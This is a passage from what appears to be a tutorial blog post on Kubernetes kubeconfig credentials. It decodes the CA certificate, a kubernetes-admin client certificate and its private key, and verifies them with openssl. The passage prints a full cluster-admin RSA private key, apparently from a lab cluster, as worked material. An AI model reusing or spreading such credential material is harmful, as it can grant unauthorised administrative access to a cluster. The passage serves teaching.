DQVRFLS0tLS0K' | base64 -d > ca.crt
stephen@kubemaster:~/certs$ cat ca.crt
-----BEGIN CERTIFICATE-----
MIIDBTCCAe2gAwIBAgIIBy6KdfKkQ3gwDQYJKoZIhvcNAQELBQAwFTETMBEGA1UE
AxMKa3ViZXJuZXRlczAeFw0yMzExMDgwMTIwNDZaFw0zMzExMDUwMTI1NDZaMBUx
EzARBgNVBAMTCmt1YmVybmV0ZXMwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
AoIBAQC+lUi8cHdUbcbHUbFY2fCWxQ4+On9jV4isqXeuysD+hvT4PaY9TM/OzOwP
OA1YmyhSTrADlS+jjqfx/O73cE15Sw5JoW3JyTmmo8sp1E8ODB0U7YtOVirRBMen
lkJSKP9BMTMNaInEbH/8zP5I/Y5lcIVGy6b1BYsG/+/Bwj4bAPgm7ZQfkhkyqY2j
jxcUh0/H5bUFXeFdyFhhqxIvHaDsKG5bhVHREmuLSJsoTG8ygD/i3nhtkxF0KHxj
A1+QKdDjaTYajnacnZ2jG+AFENMC2NYw3rAMX/P54Np6P9JkukCS+XK2lCvb3PIq
SadMIj+lITTjezbgcw2cv2A+6B5DAgMBAAGjWTBXMA4GA1UdDwEB/wQEAwICpDAP
BgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBTgYbD4N8i7PgpS7OKuEb5xlEHEnDAV
BgNVHREEDjAMggprdWJlcm5ldGVzMA0GCSqGSIb3DQEBCwUAA4IBAQAUjRiaXfQN
aE45Vcw52/bXev/7ZZq7Nd/k8CFygKNr2rmiNQcIkI71qvILDxFhOsNUhaITGQNZ
dYOfg7D976agn1HtcAAm9IIEAihnu9SLXW4sQvXpWXG+zSNzd21JDKD/Yyr2nCTM
+6jMSQbl9gGOjXCuES4f7jyjEtUDHyttiCxRDUnzSoporlG8j/xzhP8iZHCzRVGP
in9a/iEx9ReCNrnsKSH7JuAfX0YzLAAJx5JWA4j3qoI2bPgAv/naUOiJckYZTuks
wdBrTDRT8krq8JgcBLBDkV6nUD45+llHAB8GunHXdtIXw4tKtBuLgxk44KUQJdov
xwf5rtvfVj66
-----END CERTIFICATE-----
</code></pre></div></div>
<p>This looks like a PEM encoded X.509 certificate. Let’s parse it using openssl to try and understand what it’s purpose is.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ openssl x509 -in ca.crt -text -noout
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 517503246380843896 (0x72e8a75f2a44378)
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN = kubernetes
Validity
Not Before: Nov 8 01:20:46 2023 GMT
Not After : Nov 5 01:25:46 2033 GMT
Subject: CN = kubernetes
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:be:95:48:bc:70:77:54:6d:c6:c7:51:b1:58:d9:
f0:96:c5:0e:3e:3a:7f:63:57:88:ac:a9:77:ae:ca:
c0:fe:86:f4:f8:3d:a6:3d:4c:cf:ce:cc:ec:0f:38:
0d:58:9b:28:52:4e:b0:03:95:2f:a3:8e:a7:f1:fc:
ee:f7:70:4d:79:4b:0e:49:a1:6d:c9:c9:39:a6:a3:
cb:29:d4:4f:0e:0c:1d:14:ed:8b:4e:56:2a:d1:04:
c7:a7:96:42:52:28:ff:41:31:33:0d:68:89:c4:6c:
7f:fc:cc:fe:48:fd:8e:65:70:85:46:cb:a6:f5:05:
8b:06:ff:ef:c1:c2:3e:1b:00:f8:26:ed:94:1f:92:
19:32:a9:8d:a3:8f:17:14:87:4f:c7:e5:b5:05:5d:
e1:5d:c8:58:61:ab:12:2f:1d:a0:ec:28:6e:5b:85:
51:d1:12:6b:8b:48:9b:28:4c:6f:32:80:3f:e2:de:
78:6d:93:11:74:28:7c:63:03:5f:90:29:d0:e3:69:
36:1a:8e:76:9c:9d:9d:a3:1b:e0:05:10:d3:02:d8:
d6:30:de:b0:0c:5f:f3:f9:e0:da:7a:3f:d2:64:ba:
40:92:f9:72:b6:94:2b:db:dc:f2:2a:49:a7:4c:22:
3f:a5:21:34:e3:7b:36:e0:73:0d:9c:bf:60:3e:e8:
1e:43
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment, Certificate Sign
X509v3 Basic Constraints: critical
CA:TRUE
X509v3 Subject Key Identifier:
E0:61:B0:F8:37:C8:BB:3E:0A:52:EC:E2:AE:11:BE:71:94:41:C4:9C
X509v3 Subject Alternative Name:
DNS:kubernetes
Signature Algorithm: sha256WithRSAEncryption
Signature Value:
14:8d:18:9a:5d:f4:0d:68:4e:39:55:cc:39:db:f6:d7:7a:ff:
fb:65:9a:bb:35:df:e4:f0:21:72:80:a3:6b:da:b9:a2:35:07:
08:90:8e:f5:aa:f2:0b:0f:11:61:3a:c3:54:85:a2:13:19:03:
59:75:83:9f:83:b0:fd:ef:a6:a0:9f:51:ed:70:00:26:f4:82:
04:02:28:67:bb:d4:8b:5d:6e:2c:42:f5:e9:59:71:be:cd:23:
73:77:6d:49:0c:a0:ff:63:2a:f6:9c:24:cc:fb:a8:cc:49:06:
e5:f6:01:8e:8d:70:ae:11:2e:1f:ee:3c:a3:12:d5:03:1f:2b:
6d:88:2c:51:0d:49:f3:4a:8a:68:ae:51:bc:8f:fc:73:84:ff:
22:64:70:b3:45:51:8f:8a:7f:5a:fe:21:31:f5:17:82:36:b9:
ec:29:21:fb:26:e0:1f:5f:46:33:2c:00:09:c7:92:56:03:88:
f7:aa:82:36:6c:f8:00:bf:f9:da:50:e8:89:72:46:19:4e:e9:
2c:c1:d0:6b:4c:34:53:f2:4a:ea:f0:98:1c:04:b0:43:91:5e:
a7:50:3e:39:fa:59:47:00:1f:06:ba:71:d7:76:d2:17:c3:8b:
4a:b4:1b:8b:83:19:38:e0:a5:10:25:da:2f:c7:07:f9:ae:db:
df:56:3e:ba
</code></pre></div></div>
<p>There are a number of interesting features here. Let’s list out some of the more important ones and discuss their meaning:</p>
<ul>
<li><strong>X509v3 Basic Constraints</strong> - This contains the value <code class="language-plaintext highlighter-rouge">CA:TRUE</code> which identifies the certificate as a Certificate Authority - a certificate used to verify the trustworthiness of other certificates.</li>
<li><strong>Subject</strong> - This has the value <code class="language-plaintext highlighter-rouge">CN = kubernetes</code>, which names the entity that the certificate represents.</li>
<li><strong>Issuer</strong> - This contains the value <code class="language-plaintext highlighter-rouge">CN = kubernetes</code>, which names the entity that issued the certificate. The fact this value matches the <strong>Subject</strong> suggests the certificate is self issued, a root CA.</li>
<li><strong>X509v3 Key Usage</strong> - Which contains the values <code class="language-plaintext highlighter-rouge">Digital Signature, Key Encipherment, Certificate Sign</code>, which lists the purposes for which the certificate is intended to be used for.</li>
<li><strong>X509v3 Subject Key Identifier</strong> - Which has the value <code class="language-plaintext highlighter-rouge">E0:61:B0:F8:37:C8:BB:3E:0A:52:EC:E2:AE:11:BE:71:94:41:C4:9C</code>, which uniquely identifies the cryptographic key associated with the certificate.</li>
</ul>
<p>So from this, we know that this certificate is used to identify other certificates being used with “kubernetes”, and we have the unique identifier of the key whose signatures will be used to verify this association.</p>
<p>These will become relevant later.</p>
<p>The fact that the Subject and Issuer match and that there is no Authority Key Identifier also suggests that this is a root CA - the start of it’s own chain of trust. We can confirm this by trying to verify the authenticity of the certificate using it’s own included public key using openssl like so.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ openssl verify -verbose -CAfile ca.crt ca.crt
ca.crt: OK
</code></pre></div></div>
<p>This verifies this certificate is a self signed root CA.</p>
<p>Now let’s look at the blob from <code class="language-plaintext highlighter-rouge">client-certificate-data</code> in the same manner.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ echo 'LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURJVENDQWdtZ0F3SUJBZ0lJV28rZ1plVWE3dzR3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB5TXpFeE1EZ3dNVEl3TkRaYUZ3MHlOREV4TURjd01USTFORGRhTURReApGekFWQmdOVkJBb1REbk41YzNSbGJUcHRZWE4wWlhKek1Sa3dGd1lEVlFRREV4QnJkV0psY201bGRHVnpMV0ZrCmJXbHVNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQXloQjFlR2JmNjBUUjE5RmYKUVdYb1VmTFVNWUFERnUydDBrL1ZUbDNSYzN6VVU0bjlvYU9VME5EQ1psNzIxK3Z4RS9ISnZxdnIrTDkzbHBWTwpnRVo3dytXT1MyN2ViL2Nrd0pwYlRheHB2WGYxdFlqNm9ub1lGSUNuWTlCMGE2SG91dC9hZ1UzQUtSRmNTK0NGCkVKVU9udnkrOHF0Y1luT2RBR2Jpd1ZieXJDWlNsVVVQMnZvOWNpcC9hUUJsSk96NEs4bTlSa3hoUjFBV3FUdU4KQkRMWTVMUlN1SHNOWTRnTk8yankzcU5qUjBxS0RFZ29IMmhKUnFmR3M4ZWdMVFM3OVBMdnFkbHJ2di8waHdUWQp1UXVoNWZOWW5SRkZwR1RreFR1b2wvNWNBWmlnQkRraUtrR0c2UFR2R2tiRWd6QTNveDZIckljcFZNSHpEdzRRCjhUOEVMUUlEQVFBQm8xWXdWREFPQmdOVkhROEJBZjhFQkFNQ0JhQXdFd1lEVlIwbEJBd3dDZ1lJS3dZQkJRVUgKQXdJd0RBWURWUjBUQVFIL0JBSXdBREFmQmdOVkhTTUVHREFXZ0JUZ1liRDROOGk3UGdwUzdPS3VFYjV4bEVIRQpuREFOQmdrcWhraUc5dzBCQVFzRkFBT0NBUUVBbmNuVnBDYUg5ck9GQkExMW5DalhISzAwRG13R1FJZnpjV2x0CkJ3RzRwR2lTK0RRR3ltODFwVEtHblhTQU1UZENvVmI2QzlrdWMrWkR0bG5iL05xZUk2WHpnVjdVbXp2V0E0N0gKSThvSHl5V3RjY1pNcUNwOTNnZUJDb3lZdW42SkpnTVozbHJhRTN6U1hxU0xzQ0hZWXpJZlRLWnFRdFFhbnBaNAp3SUVIMlBtZ1FxMmR4bmtoak9JSWF0bm54U0owdno1MDlXQVBQOStrSEpVeUh2N1V0a0pDL2J3aE5SdDh1RmluClBsN3Z3NGRUY1p4dS81SHlqcnlRcUVKUFBHS2ZnRlBja0dyclBXL1I1bUJHclVxRlZqYXN0TGQzekNMNG1GT0UKUWdyOTNMajh2ZnA1dFQrbFljRUkrYit3czdJaWFUQW9OdktVQXd4bXFmVzl2L1ZyZFE9PQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==' | base64 -d > client.crt
stephen@kubemaster:~/certs$ cat client.crt
-----BEGIN CERTIFICATE-----
MIIDITCCAgmgAwIBAgIIWo+gZeUa7w4wDQYJKoZIhvcNAQELBQAwFTETMBEGA1UE
AxMKa3ViZXJuZXRlczAeFw0yMzExMDgwMTIwNDZaFw0yNDExMDcwMTI1NDdaMDQx
FzAVBgNVBAoTDnN5c3RlbTptYXN0ZXJzMRkwFwYDVQQDExBrdWJlcm5ldGVzLWFk
bWluMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyhB1eGbf60TR19Ff
QWXoUfLUMYADFu2t0k/VTl3Rc3zUU4n9oaOU0NDCZl721+vxE/HJvqvr+L93lpVO
gEZ7w+WOS27eb/ckwJpbTaxpvXf1tYj6onoYFICnY9B0a6Hout/agU3AKRFcS+CF
EJUOnvy+8qtcYnOdAGbiwVbyrCZSlUUP2vo9cip/aQBlJOz4K8m9RkxhR1AWqTuN
BDLY5LRSuHsNY4gNO2jy3qNjR0qKDEgoH2hJRqfGs8egLTS79PLvqdlrvv/0hwTY
uQuh5fNYnRFFpGTkxTuol/5cAZigBDkiKkGG6PTvGkbEgzA3ox6HrIcpVMHzDw4Q
8T8ELQIDAQABo1YwVDAOBgNVHQ8BAf8EBAMCBaAwEwYDVR0lBAwwCgYIKwYBBQUH
AwIwDAYDVR0TAQH/BAIwADAfBgNVHSMEGDAWgBTgYbD4N8i7PgpS7OKuEb5xlEHE
nDANBgkqhkiG9w0BAQsFAAOCAQEAncnVpCaH9rOFBA11nCjXHK00DmwGQIfzcWlt
BwG4pGiS+DQGym81pTKGnXSAMTdCoVb6C9kuc+ZDtlnb/NqeI6XzgV7UmzvWA47H
I8oHyyWtccZMqCp93geBCoyYun6JJgMZ3lraE3zSXqSLsCHYYzIfTKZqQtQanpZ4
wIEH2PmgQq2dxnkhjOIIatnnxSJ0vz509WAPP9+kHJUyHv7UtkJC/bwhNRt8uFin
Pl7vw4dTcZxu/5HyjryQqEJPPGKfgFPckGrrPW/R5mBGrUqFVjastLd3zCL4mFOE
Qgr93Lj8vfp5tT+lYcEI+b+ws7IiaTAoNvKUAwxmqfW9v/VrdQ==
-----END CERTIFICATE-----
</code></pre></div></div>
<p>Another certificate. let’s parse with openssl again.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ openssl x509 -in client.crt -text -noout
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 6525610744579026702 (0x5a8fa065e51aef0e)
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN = kubernetes
Validity
Not Before: Nov 8 01:20:46 2023 GMT
Not After : Nov 7 01:25:47 2024 GMT
Subject: O = system:masters, CN = kubernetes-admin
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:ca:10:75:78:66:df:eb:44:d1:d7:d1:5f:41:65:
e8:51:f2:d4:31:80:03:16:ed:ad:d2:4f:d5:4e:5d:
d1:73:7c:d4:53:89:fd:a1:a3:94:d0:d0:c2:66:5e:
f6:d7:eb:f1:13:f1:c9:be:ab:eb:f8:bf:77:96:95:
4e:80:46:7b:c3:e5:8e:4b:6e:de:6f:f7:24:c0:9a:
5b:4d:ac:69:bd:77:f5:b5:88:fa:a2:7a:18:14:80:
a7:63:d0:74:6b:a1:e8:ba:df:da:81:4d:c0:29:11:
5c:4b:e0:85:10:95:0e:9e:fc:be:f2:ab:5c:62:73:
9d:00:66:e2:c1:56:f2:ac:26:52:95:45:0f:da:fa:
3d:72:2a:7f:69:00:65:24:ec:f8:2b:c9:bd:46:4c:
61:47:50:16:a9:3b:8d:04:32:d8:e4:b4:52:b8:7b:
0d:63:88:0d:3b:68:f2:de:a3:63:47:4a:8a:0c:48:
28:1f:68:49:46:a7:c6:b3:c7:a0:2d:34:bb:f4:f2:
ef:a9:d9:6b:be:ff:f4:87:04:d8:b9:0b:a1:e5:f3:
58:9d:11:45:a4:64:e4:c5:3b:a8:97:fe:5c:01:98:
a0:04:39:22:2a:41:86:e8:f4:ef:1a:46:c4:83:30:
37:a3:1e:87:ac:87:29:54:c1:f3:0f:0e:10:f1:3f:
04:2d
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Authority Key Identifier:
E0:61:B0:F8:37:C8:BB:3E:0A:52:EC:E2:AE:11:BE:71:94:41:C4:9C
Signature Algorithm: sha256WithRSAEncryption
Signature Value:
9d:c9:d5:a4:26:87:f6:b3:85:04:0d:75:9c:28:d7:1c:ad:34:
0e:6c:06:40:87:f3:71:69:6d:07:01:b8:a4:68:92:f8:34:06:
ca:6f:35:a5:32:86:9d:74:80:31:37:42:a1:56:fa:0b:d9:2e:
73:e6:43:b6:59:db:fc:da:9e:23:a5:f3:81:5e:d4:9b:3b:d6:
03:8e:c7:23:ca:07:cb:25:ad:71:c6:4c:a8:2a:7d:de:07:81:
0a:8c:98:ba:7e:89:26:03:19:de:5a:da:13:7c:d2:5e:a4:8b:
b0:21:d8:63:32:1f:4c:a6:6a:42:d4:1a:9e:96:78:c0:81:07:
d8:f9:a0:42:ad:9d:c6:79:21:8c:e2:08:6a:d9:e7:c5:22:74:
bf:3e:74:f5:60:0f:3f:df:a4:1c:95:32:1e:fe:d4:b6:42:42:
fd:bc:21:35:1b:7c:b8:58:a7:3e:5e:ef:c3:87:53:71:9c:6e:
ff:91:f2:8e:bc:90:a8:42:4f:3c:62:9f:80:53:dc:90:6a:eb:
3d:6f:d1:e6:60:46:ad:4a:85:56:36:ac:b4:b7:77:cc:22:f8:
98:53:84:42:0a:fd:dc:b8:fc:bd:fa:79:b5:3f:a5:61:c1:08:
f9:bf:b0:b3:b2:22:69:30:28:36:f2:94:03:0c:66:a9:f5:bd:
bf:f5:6b:75
</code></pre></div></div>
<p>Let’s examine at some of the relevant fields again.</p>
<ul>
<li><strong>X509v3 Basic Constraints</strong> - This contains the value <code class="language-plaintext highlighter-rouge">CA:FALSE</code> which identifies the certificate is NOT a Certificate Authority.</li>
<li><strong>Subject</strong> - This has the value <code class="language-plaintext highlighter-rouge">O = system:masters, CN = kubernetes-admin</code>, which names the entity that the certificate represents. We will talk about the significance of the values later.</li>
<li><strong>Issuer</strong> - This contains the value <code class="language-plaintext highlighter-rouge">CN = kubernetes</code>, which names the entity that issued the certificate. It matches the <strong>Subject</strong> from the previous certificate, suggesting (but not proving) the previous certificate signed this one.</li>
<li><strong>X509v3 Authority Key Identifier</strong> - Which has the value <code class="language-plaintext highlighter-rouge">E0:61:B0:F8:37:C8:BB:3E:0A:52:EC:E2:AE:11:BE:71:94:41:C4:9C</code>, which uniquely identifies the key pair (public+private key) associated with certificate that issued this certificate. It matches the <strong>X509v3 Subject Key Identifier</strong> value from the previous certificate, suggesting (but again not proving) that certificate signed this one.</li>
<li><strong>X509v3 Extended Key Usage</strong> - Which contains the values <code class="language-plaintext highlighter-rouge">TLS Web Client Authentication</code>, which lists the “extended” purpose for which the certificate is intended to be used for. This refers to a certificate used for for TLS client authentication. This is the relatively infrequently appearing use case where the client in a TLS session uses a certificate to identify itself to the server, as opposed to the most common scenario where only the server uses an identifying certificate.</li>
</ul>
<p>These fields suggest that this certificate was issued by the first CA certificate we examined, but we dont know this for sure unless we can confirm that the private key associated with the first certificate was used to sign this certificate. This can be done using openssl again.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ openssl verify -verbose -CAfile ca.crt client.crt
client.crt: OK
</code></pre></div></div>
<p>This verifies that this certificate was issued by the first CA certificate - it is part of it’s chain of trust.</p>
<p>Let’s now examine the final blob named <code class="language-plaintext highlighter-rouge">client-key-data</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ echo 'LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFb3dJQkFBS0NBUUVBeWhCMWVHYmY2MFRSMTlGZlFXWG9VZkxVTVlBREZ1MnQway9WVGwzUmMzelVVNG45Cm9hT1UwTkRDWmw3MjErdnhFL0hKdnF2citMOTNscFZPZ0VaN3crV09TMjdlYi9ja3dKcGJUYXhwdlhmMXRZajYKb25vWUZJQ25ZOUIwYTZIb3V0L2FnVTNBS1JGY1MrQ0ZFSlVPbnZ5KzhxdGNZbk9kQUdiaXdWYnlyQ1pTbFVVUAoydm85Y2lwL2FRQmxKT3o0SzhtOVJreGhSMUFXcVR1TkJETFk1TFJTdUhzTlk0Z05PMmp5M3FOalIwcUtERWdvCkgyaEpScWZHczhlZ0xUUzc5UEx2cWRscnZ2LzBod1RZdVF1aDVmTlluUkZGcEdUa3hUdW9sLzVjQVppZ0JEa2kKS2tHRzZQVHZHa2JFZ3pBM294NkhySWNwVk1IekR3NFE4VDhFTFFJREFRQUJBb0lCQURpZmhodVlVSFZBVXNGMApwWW5SQWRvOC91TmtLUGw2M3pQSk5WQUJrRmtaaVBKai85UVUzL1hvR2lIUHlNSlhGclp0RWdqQmFwM0pJYnpyCjJCU3dLNnlJbm1oYkNEQStCR21JbDc5YmFrSXk1SUxiZ01pWkNEaHVtUG1xaDRWRjJNN05QaER2OWNKTVlCM1AKSzlxcXVtOHBDbVU4U2VZNDJhMHNKNnpnTFo2NW12L1pwVWJrRDVXMGtFckNtcldWYXBrb0dHUzMraEVmZ0xuVQo3WmkwWmQxSm04RFpBcVBaZjB2K2xEcTRRNlA2cFRyWkZhSHRKeXE1R3BaaG5LdzFRSVAvZDM4SkdrWmJ2bDZTCmdLdWREZHR3UWtLWDhFc3hzUElzcHFYWmlJRnRHbEd4UjNWT3lSaXo1WlIvTDVQUDYvSHZ5QjZVMVMzU0MydW0KMGc1TW9xMENnWUVBNVA3K3J6Yjh0WkFQQzdMdTAwcm5CeUZLVWoyWUVKU3hwLy8wREtuWGtmcTZ2a01wZmo1TwpRNC8vcVJxMFBsTXlIbFF3dFpkVXdmb0Raem1tSUZGYkNucDhoYWl5Z3JVMldVZjRkc0Y4ZVExN0NPVHhURGkzCndqL3Z5MXNtaUw2OEVIMjNNeW94YitXamRaZUJKQVRSS05pWDFvbHFFUE5xVlRrd21TZkl2b01DZ1lFQTRlUncKWUNpKytqUnVwTEMzb0FvYzZWTU9zZllJdkhhTG5iQkx0SVVZWnFpaU5Namp1UHJnSE0vcnRCc3BPYmhWSCtpdQpOZ0YrS2pMa1ZsY0Rxd1NuQ20vcEdoVCtXeFhVdjNpRjRHSWQ5cm5iYVhRbklIbzNLWk56VzRKWDJ1b2d0dmFaCjVNS3JiVHg4QnpjRGhIMDFGdEtBM1VycGFTTU9vN3h2blVUTnM0OENnWUVBa05DbGRWN2J2MkpEOFkwTnRYZG4KMUwxN3g3aUdBdTVWenoxeE05VHdxN09aQnh0b0VSc0wyWFFtSk9YcldJSzZiaTJseENEWWkvYzAwY0hHU2lmSQo0RDZIb3VzRlFOMmlhaUcyZ2p0b0lSR2lYZ1NTaURaU0Z6amh4NE4wUWdRRTRKVHdGeDQydDJITTFsK2lYb25oClQraHhWVTMvVW9ydEVzb2c3cW9YTEVzQ2dZQkt4ek9JTVpUZkFRSnJsSENGRXpQMDdXRGMrcVJ6dHc2SzJmU0YKd3RXTURtRDc5bENrU0xCdCtVcCtxY3NnNTJ1T2o1azBHWlJwWmNWKzYzazBZT3JuSXByWTNvQkJLTjN2c0hjcApDM0g5M2hMTE92OUUyaEJ1dS9naEgrbnpkelB6UFhrK2FFOFZiME5qcEF1UERWL0l1VkNkY1JJSmt1aGl2WnQ1ClJYQ084d0tCZ0NFVGU1bm9xMFRHL2xVSFRnYVU0L3lBdi8rZjc5azlTOWw4a2xxR2RPSnBZZVZRVHdvSjZ1b1oKRndUMGhXYXdjK3NSWXRGeGxYMUhzV2huWmNLbVg3OGxJM2pLRDFwYXVrZURhVjFzQ0p4QnlIWVVSOXN2aWM5ZgplektZVHdCS1NLN2NPaTVPNFlPV3J1N255TTVXdEhHN25CVngxNmJTaHJRL2Nzc3A3UWVxCi0tLS0tRU5EIFJTQSBQUklWQVRFIEtFWS0tLS0tCg==' | base64 -d > client.key
(crypto) stephen@kubemaster:~/certs$ cat client.key
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAyhB1eGbf60TR19FfQWXoUfLUMYADFu2t0k/VTl3Rc3zUU4n9
oaOU0NDCZl721+vxE/HJvqvr+L93lpVOgEZ7w+WOS27eb/ckwJpbTaxpvXf1tYj6
onoYFICnY9B0a6Hout/agU3AKRFcS+CFEJUOnvy+8qtcYnOdAGbiwVbyrCZSlUUP
2vo9cip/aQBlJOz4K8m9RkxhR1AWqTuNBDLY5LRSuHsNY4gNO2jy3qNjR0qKDEgo
H2hJRqfGs8egLTS79PLvqdlrvv/0hwTYuQuh5fNYnRFFpGTkxTuol/5cAZigBDki
KkGG6PTvGkbEgzA3ox6HrIcpVMHzDw4Q8T8ELQIDAQABAoIBADifhhuYUHVAUsF0
pYnRAdo8/uNkKPl63zPJNVABkFkZiPJj/9QU3/XoGiHPyMJXFrZtEgjBap3JIbzr
2BSwK6yInmhbCDA+BGmIl79bakIy5ILbgMiZCDhumPmqh4VF2M7NPhDv9cJMYB3P
K9qqum8pCmU8SeY42a0sJ6zgLZ65mv/ZpUbkD5W0kErCmrWVapkoGGS3+hEfgLnU
7Zi0Zd1Jm8DZAqPZf0v+lDq4Q6P6pTrZFaHtJyq5GpZhnKw1QIP/d38JGkZbvl6S
gKudDdtwQkKX8EsxsPIspqXZiIFtGlGxR3VOyRiz5ZR/L5PP6/HvyB6U1S3SC2um
0g5Moq0CgYEA5P7+rzb8tZAPC7Lu00rnByFKUj2YEJSxp//0DKnXkfq6vkMpfj5O
Q4//qRq0PlMyHlQwtZdUwfoDZzmmIFFbCnp8haiygrU2WUf4dsF8eQ17COTxTDi3
wj/vy1smiL68EH23Myoxb+WjdZeBJATRKNiX1olqEPNqVTkwmSfIvoMCgYEA4eRw
YCi++jRupLC3oAoc6VMOsfYIvHaLnbBLtIUYZqiiNMjjuPrgHM/rtBspObhVH+iu
NgF+KjLkVlcDqwSnCm/pGhT+WxXUv3iF4GId9rnbaXQnIHo3KZNzW4JX2uogtvaZ
5MKrbTx8BzcDhH01FtKA3UrpaSMOo7xvnUTNs48CgYEAkNCldV7bv2JD8Y0NtXdn
1L17x7iGAu5Vzz1xM9Twq7OZBxtoERsL2XQmJOXrWIK6bi2lxCDYi/c00cHGSifI
4D6HousFQN2iaiG2gjtoIRGiXgSSiDZSFzjhx4N0QgQE4JTwFx42t2HM1l+iXonh
T+hxVU3/UortEsog7qoXLEsCgYBKxzOIMZTfAQJrlHCFEzP07WDc+qRztw6K2fSF
wtWMDmD79lCkSLBt+Up+qcsg52uOj5k0GZRpZcV+63k0YOrnIprY3oBBKN3vsHcp
C3H93hLLOv9E2hBuu/ghH+nzdzPzPXk+aE8Vb0NjpAuPDV/IuVCdcRIJkuhivZt5
RXCO8wKBgCETe5noq0TG/lUHTgaU4/yAv/+f79k9S9l8klqGdOJpYeVQTwoJ6uoZ
FwT0hWawc+sRYtFxlX1HsWhnZcKmX78lI3jKD1paukeDaV1sCJxByHYUR9svic9f
ezKYTwBKSK7cOi5O4YOWru7nyM5WtHG7nBVx16bShrQ/cssp7Qeq
-----END RSA PRIVATE KEY-----
</code></pre></div></div>
<p>OK, this appears to be an RSA private key, and it’s likely this key is associated with the client certificate we just viewed.</p>
<p>Let’s parse it in openssl to confirm this.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ openssl rsa -in client.key -noout -text
Private-Key: (2048 bit, 2 primes)
modulus:
00:ca:10:75:78:66:df:eb:44:d1:d7:d1:5f:41:65:
e8:51:f2:d4:31:80:03:16:ed:ad:d2:4f:d5:4e:5d:
d1:73:7c:d4:53:89:fd:a1:a3:94:d0:d0:c2:66:5e:
f6:d7:eb:f1:13:f1:c9:be:ab:eb:f8:bf:77:96:95:
4e:80:46:7b:c3:e5:8e:4b:6e:de:6f:f7:24:c0:9a:
5b:4d:ac:69:bd:77:f5:b5:88:fa:a2:7a:18:14:80:
a7:63:d0:74:6b:a1:e8:ba:df:da:81:4d:c0:29:11:
5c:4b:e0:85:10:95:0e:9e:fc:be:f2:ab:5c:62:73:
9d:00:66:e2:c1:56:f2:ac:26:52:95:45:0f:da:fa:
3d:72:2a:7f:69:00:65:24:ec:f8:2b:c9:bd:46:4c:
61:47:50:16:a9:3b:8d:04:32:d8:e4:b4:52:b8:7b:
0d:63:88:0d:3b:68:f2:de:a3:63:47:4a:8a:0c:48:
28:1f:68:49:46:a7:c6:b3:c7:a0:2d:34:bb:f4:f2:
ef:a9:d9:6b:be:ff:f4:87:04:d8:b9:0b:a1:e5:f3:
58:9d:11:45:a4:64:e4:c5:3b:a8:97:fe:5c:01:98:
a0:04:39:22:2a:41:86:e8:f4:ef:1a:46:c4:83:30:
37:a3:1e:87:ac:87:29:54:c1:f3:0f:0e:10:f1:3f:
04:2d
publicExponent: 65537 (0x10001)
[....SNIP....]
</code></pre></div></div>
<p>I’ve truncated the output above in the interests of space to show the relevant parts of the key - the public modulus and exponent, which are the same values as shown in the <code class="language-plaintext highlighter-rouge">Subject Public Key Info</code> field from the client certificate. This tells us that the client key and certificate we have are associated.</p>
<p>Visually comparing the large text representations of the modulus in the certificate and key openssl outputs like we just did to confirm they match is potentially error prone, so theres a more robust approach we can use to do this more definitively.</p>
<p>We can extract the modulus of the public key from each file, hash it using a secure algorithm, and then compare the much shorter hash outputs to confirm they match. Here is how that looks using the <code class="language-plaintext highlighter-rouge">sha256</code> algorithm:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ openssl rsa -modulus -noout -in client.key | openssl sha256
SHA256(stdin)= b357a8d244376e9a6a606583df4ea37114c8ff838241479cfe8a57fe76dadb0c
stephen@kubemaster:~/certs$ openssl x509 -modulus -noout -in client.crt | openssl sha256
SHA256(stdin)= b357a8d244376e9a6a606583df4ea37114c8ff838241479cfe8a57fe76dadb0c
</code></pre></div></div>
<p>So we have a client X.509 certificate intended for TLS client authentication, as well as the associated private key, and we know that the certificate is trusted by the “kubernetes” CA. What is the significance of this?</p>
<p>Let’s see what happens if we try and make a request to the API server address we got from our config file directly in curl.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ curl https://kubemaster.thezoo.local:6443/api
curl: (60) SSL certificate problem: unable to get local issuer certificate
More details here: https://curl.se/docs/sslcerts.html
curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.
</code></pre></div></div>
